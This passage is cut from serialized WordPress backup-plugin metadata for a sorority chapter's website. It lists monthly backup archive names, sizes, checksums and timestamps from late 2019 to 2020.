\"236143459887791c03ea05b53a2a82a86507c239\";s:8:\"uploads0\";s:40:\"8682f94b80b11207d6978f27ac1cadf1827eb925\";s:8:\"uploads1\";s:40:\"a48cfd005fc66cadfca3bd2e2f0242dd11255c99\";s:7:\"others0\";s:40:\"08bf8691b50272470c6efd4eb5a490f2c26c3a73\";s:3:\"db0\";s:40:\"751062eaed9332deab9bc36d63c2dd42fb641e55\";}s:6:\"sha256\";a:6:{s:8:\"plugins0\";s:64:\"3d8d57c739931f1a8bb848f7cc201c2c25f6216c991e7b92f90f6c91c55c2e9b\";s:7:\"themes0\";s:64:\"5b26385ccc8d892f725b01a8a76bd6f551e755a227075bce96b9f653cb15b47f\";s:8:\"uploads0\";s:64:\"43a3b9720b5ef352f9fb5b7fb6d876b7ee159ad857ae7fce432022a5551f06bb\";s:8:\"uploads1\";s:64:\"45a8936aed97dcedf5af431aa245c47615f8f28e7db4c6cdde002f8a6494cb39\";s:7:\"others0\";s:64:\"735f21c65ba5a60ecd84cbf0859f9e370879633645c2eeeba94f8fa7f027362d\";s:3:\"db0\";s:64:\"6248326040d4688119454b54bf9e177bdc7c3537abcf071735e4d733ec231629\";}}s:5:\"nonce\";s:12:\"5a15787dc28c\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1600754108;s:6:\"themes\";i:1600754124;s:7:\"uploads\";i:1600754124;s:6:\"others\";i:1600754159;}s:18:\"created_by_version\";s:7:\"1.14.13\";s:12:\"is_multisite\";b:0;}i:1598076203;a:19:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2020-08-22-0103_Zeta_Phi_Beta_Sorority_Inc_Lam_89e6bd44196d-plugins.zip\";}s:12:\"plugins-size\";i:51824926;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2020-08-22-0103_Zeta_Phi_Beta_Sorority_Inc_Lam_89e6bd44196d-themes.zip\";}s:11:\"themes-size\";i:6650581;s:7:\"uploads\";a:2:{i:0;s:78:\"backup_2020-08-22-0103_Zeta_Phi_Beta_Sorority_Inc_Lam_89e6bd44196d-uploads.zip\";i:1;s:79:\"backup_2020-08-22-0103_Zeta_Phi_Beta_Sorority_Inc_Lam_89e6bd44196d-uploads2.zip\";}s:12:\"uploads-size\";i:381669124;s:13:\"uploads1-size\";i:233724347;s:6:\"others\";a:1:{i:0;s:77:\"backup_2020-08-22-0103_Zeta_Phi_Beta_Sorority_Inc_Lam_89e6bd44196d-others.zip\";}s:11:\"others-size\";i:131048201;s:2:\"db\";s:72:\"backup_2020-08-22-0103_Zeta_Phi_Beta_Sorority_Inc_Lam_89e6bd44196d-db.gz\";s:7:\"db-size\";i:3470552;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:6:{s:8:\"plugins0\";s:40:\"61ef24d6661e4f3668bb8507ccda1aab0f9b4362\";s:7:\"themes0\";s:40:\"64dc4350e0d28767a9ce34b7fcceeb7ff5d6951b\";s:8:\"uploads0\";s:40:\"750a4ce2e4b782b06bf70b57404871a58ad85552\";s:8:\"uploads1\";s:40:\"15ac82562c73cd4d7c615195c4a16ac650f591eb\";s:7:\"others0\";s:40:\"22f347019e40c3f27495bd9fa56dabc5b1db0b2a\";s:3:\"db0\";s:40:\"2f7848fdf46a3a876a4da5111bde8fa9d51ad966\";}s:6:\"sha256\";a:6:{s:8:\"plugins0\";s:64:\"9338b4dabd70bb3e6d35e208b5571f54d48ef4af399f7a344ac35184ac1f1798\";s:7:\"themes0\";s:64:\"0af90b6111fedc4fa31bbb50c642d84c4e229c144e51a721371128fe0e285fc3\";s:8:\"uploads0\";s:64:\"83b6f3b85f3ecc215ac74268b7778e8a83c9dbc8ec5349d581fd2548035e80e2\";s:8:\"uploads1\";s:64:\"7cf3fd8955816b2f443d9a1414b5f5530d94c023a4122fb6be121a77dd1b4a9f\";s:7:\"others0\";s:64:\"c528e4df3bfe32d7d48a234265ff83c0a2e858de8e11c33c57bae955fe37f01a\";s:3:\"db0\";s:64:\"fcc4c7abd3b3e0de56bf62a47c2cd577f573baa3e9985286820c3a78366325a7\";}}s:5:\"nonce\";s:12:\"89e6bd44196d\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1598076203;s:6:\"themes\";i:1598076218;s:7:\"uploads\";i:1598076219;s:6:\"others\";i:1598076255;}s:18:\"created_by_version\";s:7:\"1.14.13\";s:12:\"is_multisite\";b:0;}i:1595398123;a:19:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2020-07-22-0108_Zeta_Phi_Beta_Sorority_Inc_Lam_2dc3d3e0fa3b-plugins.zip\";}s:12:\"plugins-size\";i:51824926;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2020-07-22-0108_Zeta_Phi_Beta_Sorority_Inc_Lam_2dc3d3e0fa3b-themes.zip\";}s:11:\"themes-size\";i:5392662;s:7:\"uploads\";a:2:{i:0;s:78:\"backup_2020-07-22-0108_Zeta_Phi_Beta_Sorority_Inc_Lam_2dc3d3e0fa3b-uploads.zip\";i:1;s:79:\"backup_2020-07-22-0108_Zeta_Phi_Beta_Sorority_Inc_Lam_2dc3d3e0fa3b-uploads2.zip\";}s:12:\"uploads-size\";i:381668964;s:13:\"uploads1-size\";i:229692851;s:6:\"others\";a:1:{i:0;s:77:\"backup_2020-07-22-0108_Zeta_Phi_Beta_Sorority_Inc_Lam_2dc3d3e0fa3b-others.zip\";}s:11:\"others-size\";i:131048201;s:2:\"db\";s:72:\"backup_2020-07-22-0108_Zeta_Phi_Beta_Sorority_Inc_Lam_2dc3d3e0fa3b-db.gz\";s:7:\"db-size\";i:3239677;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:6:{s:8:\"plugins0\";s:40:\"81348e4c0e19b4e9ed9b0317cc547d940932fffa\";s:7:\"themes0\";s:40:\"5a8cc4b8041a537316e105506bd42d1253596b73\";s:8:\"uploads0\";s:40:\"dbc32b0a8b5429d81dbfdcf767347d0c8cdebf27\";s:8:\"uploads1\";s:40:\"b2d5c4755f6b13114d5397ccdf0c5535c6cae717\";s:7:\"others0\";s:40:\"3e798937c0345ac796ea07b98bd2c19646d284e2\";s:3:\"db0\";s:40:\"b22f076c1bc6c15637cb1fe4eb3b7e24edcb79d1\";}s:6:\"sha256\";a:6:{s:8:\"plugins0\";s:64:\"fc5ce9d8862efc59c16e5c62697c4daa3ad5fa6f178535c86b34335f2421daa0\";s:7:\"themes0\";s:64:\"c18c4af46700516acc2ef62e925c81100b0ffb355cec41eb7ecfc616480a5ef8\";s:8:\"uploads0\";s:64:\"e4d6178db69a638635d25d2d7d7d030e2f7eac760b6bcd7842125c5aabb6865f\";s:8:\"uploads1\";s:64:\"0f523262898beaca579e49ef3e598dc388ca0caf3dbd2cb3c01edc5af85c9bf8\";s:7:\"others0\";s:64:\"5b002f13e2f8183ea2dd27bb97e737169c0526ab88b6ca98ec54930e4457892f\";s:3:\"db0\";s:64:\"98bb0537cc6ea9a92b43d6f8919964cab5d68e0f4f79fd3ee96e0d93405fe576\";}}s:5:\"nonce\";s:12:\"2dc3d3e0fa3b\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1595398123;s:6:\"themes\";i:1595398139;s:7:\"uploads\";i:1595398140;s:6:\"others\";i:1595398177;}s:18:\"created_by_version\";s:7:\"1.14.13\";s:12:\"is_multisite\";b:0;}i:1592805751;a:19:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2020-06-22-0102_Zeta_Phi_Beta_Sorority_Inc_Lam_2eb4960e888b-plugins.zip\";}s:12:\"plugins-size\";i:51294983;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2020-06-22-0102_Zeta_Phi_Beta_Sorority_Inc_Lam_2eb4960e888b-themes.zip\";}s:11:\"themes-size\";i:5392662;s:7:\"uploads\";a:2:{i:0;s:78:\"backup_2020-06-22-0102_Zeta_Phi_Beta_Sorority_Inc_Lam_2eb4960e888b-uploads.zip\";i:1;s:79:\"backup_2020-06-22-0102_Zeta_Phi_Beta_Sorority_Inc_Lam_2eb4960e888b-uploads2.zip\";}s:12:\"uploads-size\";i:381668804;s:13:\"uploads1-size\";i:225112164;s:6:\"others\";a:1:{i:0;s:77:\"backup_2020-06-22-0102_Zeta_Phi_Beta_Sorority_Inc_Lam_2eb4960e888b-others.zip\";}s:11:\"others-size\";i:131045470;s:2:\"db\";s:72:\"backup_2020-06-22-0102_Zeta_Phi_Beta_Sorority_Inc_Lam_2eb4960e888b-db.gz\";s:7:\"db-size\";i:3094607;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:6:{s:8:\"plugins0\";s:40:\"62ef94a7a675c3d718d83ebe7019d0be65f68ecf\";s:7:\"themes0\";s:40:\"5a8cc4b8041a537316e105506bd42d1253596b73\";s:8:\"uploads0\";s:40:\"fd7a4d3d99244ac5f4d651320f478759995ab21e\";s:8:\"uploads1\";s:40:\"e45450f706569d3d0fa19ccccd4ca71ea131f871\";s:7:\"others0\";s:40:\"1c0c28abcf79c332133a186c66f000b003ceddc9\";s:3:\"db0\";s:40:\"b166b8a4a337e9de6bcf08a2cc9e52a7f164ea66\";}s:6:\"sha256\";a:6:{s:8:\"plugins0\";s:64:\"d364f03a2bdceeabc018a6b1790a5103953db71640eb31c87fbfcdf763df149f\";s:7:\"themes0\";s:64:\"c18c4af46700516acc2ef62e925c81100b0ffb355cec41eb7ecfc616480a5ef8\";s:8:\"uploads0\";s:64:\"74e32275ef1047fb183d5f359e5bc122c78d2a57047d12a899d04e5e9f57baed\";s:8:\"uploads1\";s:64:\"345105742e10a39e399e34b51c2fe6add480977c38695790b35323df0d0c99b4\";s:7:\"others0\";s:64:\"1832dfc0e9dd53fe292890809cf2b9d9b911fcc03edb6f2e4a045afb24b8bd5b\";s:3:\"db0\";s:64:\"10a06286d90debd1d6236529d3e5a18b404f8868cc9d0fe25140618492f52f32\";}}s:5:\"nonce\";s:12:\"2eb4960e888b\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1592805751;s:6:\"themes\";i:1592805764;s:7:\"uploads\";i:1592805765;s:6:\"others\";i:1592805798;}s:18:\"created_by_version\";s:7:\"1.14.13\";s:12:\"is_multisite\";b:0;}i:1590126669;a:19:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2020-05-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_ef644b90ce33-plugins.zip\";}s:12:\"plugins-size\";i:51290616;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2020-05-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_ef644b90ce33-themes.zip\";}s:11:\"themes-size\";i:5392662;s:7:\"uploads\";a:2:{i:0;s:78:\"backup_2020-05-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_ef644b90ce33-uploads.zip\";i:1;s:79:\"backup_2020-05-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_ef644b90ce33-uploads2.zip\";}s:12:\"uploads-size\";i:381668644;s:13:\"uploads1-size\";i:225112164;s:6:\"others\";a:1:{i:0;s:77:\"backup_2020-05-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_ef644b90ce33-others.zip\";}s:11:\"others-size\";i:131045302;s:2:\"db\";s:72:\"backup_2020-05-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_ef644b90ce33-db.gz\";s:7:\"db-size\";i:2954371;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:6:{s:8:\"plugins0\";s:40:\"b364beb56e19ab4a5d343633c14c87f7a4d19d9c\";s:7:\"themes0\";s:40:\"5a8cc4b8041a537316e105506bd42d1253596b73\";s:8:\"uploads0\";s:40:\"1f349bb29427d5e52856a3893e81e2fe1dc5e745\";s:8:\"uploads1\";s:40:\"6ea7f329352295461f5d9203a4b0ba004c4cf64b\";s:7:\"others0\";s:40:\"f6285ad5f2587224e482730ebde7b00931bc279e\";s:3:\"db0\";s:40:\"a804a717b492365c38a34c406fd16afa9f81837a\";}s:6:\"sha256\";a:6:{s:8:\"plugins0\";s:64:\"e2eeca3ed8fc7c1788d6873ce8e85b25b13311b237c48dce624cf0c861cc0c39\";s:7:\"themes0\";s:64:\"c18c4af46700516acc2ef62e925c81100b0ffb355cec41eb7ecfc616480a5ef8\";s:8:\"uploads0\";s:64:\"88354cf790759524ee30a7a3fbeec897ebf15d6f6cc1abee10a949669295616a\";s:8:\"uploads1\";s:64:\"282a3baaf01895091b226730a31c1d625f94fdbe23b7c01bf1fb60e142054e21\";s:7:\"others0\";s:64:\"8c439a56f1f870aeca42984f28dc24a020665ec044b4fa0405d04fca710a2102\";s:3:\"db0\";s:64:\"50d1016c32b0270f5aa9783c1e3fb217b9ba213a6cea3258f6c86d830eb6b128\";}}s:5:\"nonce\";s:12:\"ef644b90ce33\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1590126669;s:6:\"themes\";i:1590126683;s:7:\"uploads\";i:1590126683;s:6:\"others\";i:1590126715;}s:18:\"created_by_version\";s:7:\"1.14.13\";s:12:\"is_multisite\";b:0;}i:1587538105;a:19:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2020-04-22-0148_Zeta_Phi_Beta_Sorority_Inc_Lam_fbc266d9c4ea-plugins.zip\";}s:12:\"plugins-size\";i:51180017;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2020-04-22-0148_Zeta_Phi_Beta_Sorority_Inc_Lam_fbc266d9c4ea-themes.zip\";}s:11:\"themes-size\";i:5392662;s:7:\"uploads\";a:2:{i:0;s:78:\"backup_2020-04-22-0148_Zeta_Phi_Beta_Sorority_Inc_Lam_fbc266d9c4ea-uploads.zip\";i:1;s:79:\"backup_2020-04-22-0148_Zeta_Phi_Beta_Sorority_Inc_Lam_fbc266d9c4ea-uploads2.zip\";}s:12:\"uploads-size\";i:381668484;s:13:\"uploads1-size\";i:225112164;s:6:\"others\";a:1:{i:0;s:77:\"backup_2020-04-22-0148_Zeta_Phi_Beta_Sorority_Inc_Lam_fbc266d9c4ea-others.zip\";}s:11:\"others-size\";i:131041066;s:2:\"db\";s:72:\"backup_2020-04-22-0148_Zeta_Phi_Beta_Sorority_Inc_Lam_fbc266d9c4ea-db.gz\";s:7:\"db-size\";i:2845953;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:6:{s:8:\"plugins0\";s:40:\"78d49b3db78fdc3e03c54b2c5065ceb3a7563bdc\";s:7:\"themes0\";s:40:\"5a8cc4b8041a537316e105506bd42d1253596b73\";s:8:\"uploads0\";s:40:\"d082bdc0d4b7483286c997b86677079a401df250\";s:8:\"uploads1\";s:40:\"9372e20456dd6bc8d6b26075be9eacf7833b61e4\";s:7:\"others0\";s:40:\"34b19284b9b13ee7f3c5cdcf5962c0ef5ddf9433\";s:3:\"db0\";s:40:\"04e2b3e3e5eda0cfb1a46a54bb7ae2c9d82ec0b9\";}s:6:\"sha256\";a:6:{s:8:\"plugins0\";s:64:\"be4369242cb9afb9faf4bf3d795c92d2573585f2afc6a504c77021856de262cf\";s:7:\"themes0\";s:64:\"c18c4af46700516acc2ef62e925c81100b0ffb355cec41eb7ecfc616480a5ef8\";s:8:\"uploads0\";s:64:\"7e53bc28f1fc16395dfcf014a5965b74fa1cb9685d38a4a3135b718b2bc4d7a4\";s:8:\"uploads1\";s:64:\"9f17a970fb7f20ee1837ec588ddcbbce1f04fcd17abf50ad2cc0110d942496a6\";s:7:\"others0\";s:64:\"947cb7941bc4fe2128b52ada7bfced5079407fbaa9ee47c06ebcb04e5db7a927\";s:3:\"db0\";s:64:\"c55a5c956f770caf21db33c0aa4919b9b83be266bbfc0b8290184803fffb195f\";}}s:5:\"nonce\";s:12:\"fbc266d9c4ea\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1587538105;s:6:\"themes\";i:1587538116;s:7:\"uploads\";i:1587538117;s:6:\"others\";i:1587538141;}s:18:\"created_by_version\";s:7:\"1.14.13\";s:12:\"is_multisite\";b:0;}i:1584857597;a:19:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2020-03-22-0113_Zeta_Phi_Beta_Sorority_Inc_Lam_1e0b5ad304ca-plugins.zip\";}s:12:\"plugins-size\";i:51180017;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2020-03-22-0113_Zeta_Phi_Beta_Sorority_Inc_Lam_1e0b5ad304ca-themes.zip\";}s:11:\"themes-size\";i:5392662;s:7:\"uploads\";a:2:{i:0;s:78:\"backup_2020-03-22-0113_Zeta_Phi_Beta_Sorority_Inc_Lam_1e0b5ad304ca-uploads.zip\";i:1;s:79:\"backup_2020-03-22-0113_Zeta_Phi_Beta_Sorority_Inc_Lam_1e0b5ad304ca-uploads2.zip\";}s:12:\"uploads-size\";i:381470066;s:13:\"uploads1-size\";i:201731170;s:6:\"others\";a:1:{i:0;s:77:\"backup_2020-03-22-0113_Zeta_Phi_Beta_Sorority_Inc_Lam_1e0b5ad304ca-others.zip\";}s:11:\"others-size\";i:131041066;s:2:\"db\";s:72:\"backup_2020-03-22-0113_Zeta_Phi_Beta_Sorority_Inc_Lam_1e0b5ad304ca-db.gz\";s:7:\"db-size\";i:2751634;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:6:{s:8:\"plugins0\";s:40:\"d8c5cf426d06013bd0b3416e68bc9778a35b6091\";s:7:\"themes0\";s:40:\"5a8cc4b8041a537316e105506bd42d1253596b73\";s:8:\"uploads0\";s:40:\"3707e34a1b2eff6f4e108127100a8a7631ca1a77\";s:8:\"uploads1\";s:40:\"1e84b557deb97b933ef8a08c4e51147f1653a054\";s:7:\"others0\";s:40:\"1223aae80412544c86141c0cecab8050696c101a\";s:3:\"db0\";s:40:\"b8a4131bbe82830810ea99f47e827b0f708a38a7\";}s:6:\"sha256\";a:6:{s:8:\"plugins0\";s:64:\"fc497de3fa1ed73592602fe52a1bd006df182988ec20f9f76f3f1bcada4493d0\";s:7:\"themes0\";s:64:\"c18c4af46700516acc2ef62e925c81100b0ffb355cec41eb7ecfc616480a5ef8\";s:8:\"uploads0\";s:64:\"e184ab4a00355788ff4ee998529f0d0f7e7c7fb494a5bc007569a011779cddd2\";s:8:\"uploads1\";s:64:\"59fee846bc18728c98f00cce5ce8cc75c8e94c855cff0a311beda93dda3d650b\";s:7:\"others0\";s:64:\"49eb8e236ec6178494aec3963067d9c8acc54b1e392becdc10a4b5eecf180ba4\";s:3:\"db0\";s:64:\"0bdfe69555c217fa9888ac6c9e1a158e784544a590b101b1e904cd47f5f0cc10\";}}s:5:\"nonce\";s:12:\"1e0b5ad304ca\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1584857597;s:6:\"themes\";i:1584857609;s:7:\"uploads\";i:1584857610;s:6:\"others\";i:1584857636;}s:18:\"created_by_version\";s:7:\"1.14.13\";s:12:\"is_multisite\";b:0;}i:1582351244;a:19:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2020-02-22-0100_Zeta_Phi_Beta_Sorority_Inc_Lam_66c9cd468ac2-plugins.zip\";}s:12:\"plugins-size\";i:51192406;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2020-02-22-0100_Zeta_Phi_Beta_Sorority_Inc_Lam_66c9cd468ac2-themes.zip\";}s:11:\"themes-size\";i:5392662;s:7:\"uploads\";a:2:{i:0;s:78:\"backup_2020-02-22-0100_Zeta_Phi_Beta_Sorority_Inc_Lam_66c9cd468ac2-uploads.zip\";i:1;s:79:\"backup_2020-02-22-0100_Zeta_Phi_Beta_Sorority_Inc_Lam_66c9cd468ac2-uploads2.zip\";}s:12:\"uploads-size\";i:423659806;s:13:\"uploads1-size\";i:132098678;s:6:\"others\";a:1:{i:0;s:77:\"backup_2020-02-22-0100_Zeta_Phi_Beta_Sorority_Inc_Lam_66c9cd468ac2-others.zip\";}s:11:\"others-size\";i:131041238;s:2:\"db\";s:72:\"backup_2020-02-22-0100_Zeta_Phi_Beta_Sorority_Inc_Lam_66c9cd468ac2-db.gz\";s:7:\"db-size\";i:2700462;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:6:{s:8:\"plugins0\";s:40:\"a9d11bd5e040a3d7b1455d70026c4e95f56b2c0d\";s:7:\"themes0\";s:40:\"5a8cc4b8041a537316e105506bd42d1253596b73\";s:8:\"uploads0\";s:40:\"3b2d9477317cc205acf74d7a41e8488f22022f9a\";s:8:\"uploads1\";s:40:\"b71e66d015ccaf4f17a8671766f8a3308101681e\";s:7:\"others0\";s:40:\"b6c2c8f3598f5d3291f3688da1cb97df75bbf5e9\";s:3:\"db0\";s:40:\"3bccc430c2193af5dd5108457b4f290244e14931\";}s:6:\"sha256\";a:6:{s:8:\"plugins0\";s:64:\"94144a5d6b0a6b0566e4850534c61d20975c1584e9a45fd3b7c9279ede35a6ce\";s:7:\"themes0\";s:64:\"c18c4af46700516acc2ef62e925c81100b0ffb355cec41eb7ecfc616480a5ef8\";s:8:\"uploads0\";s:64:\"90a311f0db4afda254a9763cc449c3909dda151e0fb7e821363f31c6e5314537\";s:8:\"uploads1\";s:64:\"16e9a961ede212c8e53c1918910d6b1a78e6c420935f4b6673d19a9eb2b15657\";s:7:\"others0\";s:64:\"6406efe4a26a36bf4aa88771b91b1e64380aa4a1b8c5d8d47549fa24d26c2d99\";s:3:\"db0\";s:64:\"88af92c08bf045191322d29a098e5e9de8e55edc8a51492776f796b25b9ebb28\";}}s:5:\"nonce\";s:12:\"66c9cd468ac2\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1582351244;s:6:\"themes\";i:1582351255;s:7:\"uploads\";i:1582351255;s:6:\"others\";i:1582351287;}s:18:\"created_by_version\";s:7:\"1.14.13\";s:12:\"is_multisite\";b:0;}i:1579672392;a:19:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2020-01-22-0053_Zeta_Phi_Beta_Sorority_Inc_Lam_8d45f2a59435-plugins.zip\";}s:12:\"plugins-size\";i:49547101;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2020-01-22-0053_Zeta_Phi_Beta_Sorority_Inc_Lam_8d45f2a59435-themes.zip\";}s:11:\"themes-size\";i:5392662;s:7:\"uploads\";a:2:{i:0;s:78:\"backup_2020-01-22-0053_Zeta_Phi_Beta_Sorority_Inc_Lam_8d45f2a59435-uploads.zip\";i:1;s:79:\"backup_2020-01-22-0053_Zeta_Phi_Beta_Sorority_Inc_Lam_8d45f2a59435-uploads2.zip\";}s:12:\"uploads-size\";i:380220445;s:13:\"uploads1-size\";i:165197838;s:6:\"others\";a:1:{i:0;s:77:\"backup_2020-01-22-0053_Zeta_Phi_Beta_Sorority_Inc_Lam_8d45f2a59435-others.zip\";}s:11:\"others-size\";i:131036443;s:2:\"db\";s:72:\"backup_2020-01-22-0053_Zeta_Phi_Beta_Sorority_Inc_Lam_8d45f2a59435-db.gz\";s:7:\"db-size\";i:2663426;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:6:{s:8:\"plugins0\";s:40:\"1ef19a4410b13b01b7ffa35c0c4194e8a9ed9061\";s:7:\"themes0\";s:40:\"5a8cc4b8041a537316e105506bd42d1253596b73\";s:8:\"uploads0\";s:40:\"294bb78cb377a71f59740f3960aa20654b07e9d2\";s:8:\"uploads1\";s:40:\"7babe54122eef392c909ed6dcf7a999113c35e30\";s:7:\"others0\";s:40:\"76d56b5f58265c602fd47fa3ac136a31ba046b0c\";s:3:\"db0\";s:40:\"f75ae49177d4bddf8f2c5e70d493fd646d421b8d\";}s:6:\"sha256\";a:6:{s:8:\"plugins0\";s:64:\"774b69d78408910a1c554d976aca7a4eff0e3bc050632f07f88c65f9f05a53d4\";s:7:\"themes0\";s:64:\"c18c4af46700516acc2ef62e925c81100b0ffb355cec41eb7ecfc616480a5ef8\";s:8:\"uploads0\";s:64:\"d4fe51f7621cfff982ae1189cbd6f891cbc3aa50d367042f5cfdbe68670cb9cc\";s:8:\"uploads1\";s:64:\"96fb2148b412f7540b81e35cb086d76cb79135950cee809aea96c55278444acf\";s:7:\"others0\";s:64:\"7e94ba6bac38afc2c7c34af4ac2f9717df60f47cd817236cb9c0acbfceff9a0a\";s:3:\"db0\";s:64:\"9238303f2280df823237037920ccdb59224319f14378e9f367a954f3c0c99e62\";}}s:5:\"nonce\";s:12:\"8d45f2a59435\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1579672392;s:6:\"themes\";i:1579672403;s:7:\"uploads\";i:1579672403;s:6:\"others\";i:1579672426;}s:18:\"created_by_version\";s:7:\"1.14.13\";s:12:\"is_multisite\";b:0;}i:1576995644;a:19:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2019-12-22-0120_Zeta_Phi_Beta_Sorority_Inc_Lam_d2e64bd110fc-plugins.zip\";}s:12:\"plugins-size\";i:49497204;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2019-12-22-0120_Zeta_Phi_Beta_Sorority_Inc_Lam_d2e64bd110fc-themes.zip\";}s:11:\"themes-size\";i:5392662;s:7:\"uploads\";a:2:{i:0;s:78:\"backup_2019-12-22-0120_Zeta_Phi_Beta_Sorority_Inc_Lam_d2e64bd110fc-uploads.zip\";i:1;s:79:\"backup_2019-12-22-0120_Zeta_Phi_Beta_Sorority_Inc_Lam_d2e64bd110fc-uploads2.zip\";}s:12:\"uploads-size\";i:382096849;s:13:\"uploads1-size\";i:152339790;s:6:\"others\";a:1:{i:0;s:77:\"backup_2019-12-22-0120_Zeta_Phi_Beta_Sorority_Inc_Lam_d2e64bd110fc-others.zip\";}s:11:\"others-size\";i:130777352;s:2:\"db\";s:72:\"backup_2019-12-22-0120_Zeta_Phi_Beta_Sorority_Inc_Lam_d2e64bd110fc-db.gz\";s:7:\"db-size\";i:2660570;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:6:{s:8:\"plugins0\";s:40:\"28d8ade305e4b91fa69f0c0b3a68c2ff41a37aab\";s:7:\"themes0\";s:40:\"5a8cc4b8041a537316e105506bd42d1253596b73\";s:8:\"uploads0\";s:40:\"d332be539165526a9d234246078a24c18626bc6e\";s:8:\"uploads1\";s:40:\"5e21f8e7b6af32b11aeb12eb649b35a2b30e81bc\";s:7:\"others0\";s:40:\"49e84312b38c5158b3ceb71951056f7b8f5c724c\";s:3:\"db0\";s:40:\"d59c3e138174d344fd6f264af9115d70692eaaf4\";}s:6:\"sha256\";a:6:{s:8:\"plugins0\";s:64:\"46b92a4b78991b0d15ab994668d73d3a021a8e60f68a5bc93c7ea239ead010b1\";s:7:\"themes0\";s:64:\"c18c4af46700516acc2ef62e925c81100b0ffb355cec41eb7ecfc616480a5ef8\";s:8:\"uploads0\";s:64:\"a8d163e3d093625aef86a5103cda3f39c852abd9e177400f1075d7b72f11bbdd\";s:8:\"uploads1\";s:64:\"013c31c5d7f81f5bc2dd6ca08e0cde7139865f8c584f5c010344bbc4f188335a\";s:7:\"others0\";s:64:\"03c382aeae7d21992474e0d5d611535f761673c3694be2f1bc2ba67579aafec1\";s:3:\"db0\";s:64:\"2d6b1c843ac96ad37e32b2a1862e228d39f4aae1a9b335e4d44939a69dd705ef\";}}s:5:\"nonce\";s:12:\"d2e64bd110fc\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1576995644;s:6:\"themes\";i:1576995654;s:7:\"uploads\";i:1576995655;s:6:\"others\";i:1576995674;}s:18:\"created_by_version\";s:7:\"1.14.13\";s:12:\"is_multisite\";b:0;}i:1574401827;a:19:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2019-11-22-0050_Zeta_Phi_Beta_Sorority_Inc_Lam_fa5b5ff63f88-plugins.zip\";}s:12:\"plugins-size\";i:49540391;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2019-11-22-0050_Zeta_Phi_Beta_Sorority_Inc_Lam_fa5b5ff63f88-themes.zip\";}s:11:\"themes-size\";i:5392662;s:7:\"uploads\";a:2:{i:0;s:78:\"backup_2019-11-22-0050_Zeta_Phi_Beta_Sorority_Inc_Lam_fa5b5ff63f88-uploads.zip\";i:1;s:79:\"backup_2019-11-22-0050_Zeta_Phi_Beta_Sorority_Inc_Lam_fa5b5ff63f88-uploads2.zip\";}s:12:\"uploads-size\";i:382096689;s:13:\"uploads1-size\";i:152339790;s:6:\"others\";a:1:{i:0;s:77:\"backup_2019-11-22-0050_Zeta_Phi_Beta_Sorority_Inc_Lam_fa5b5ff63f88-others.zip\";}s:11:\"others-size\";i:130777352;s:2:\"db\";s:72:\"backup_2019-11-22-0050_Zeta_Phi_Beta_Sorority_Inc_Lam_fa5b5ff63f88-db.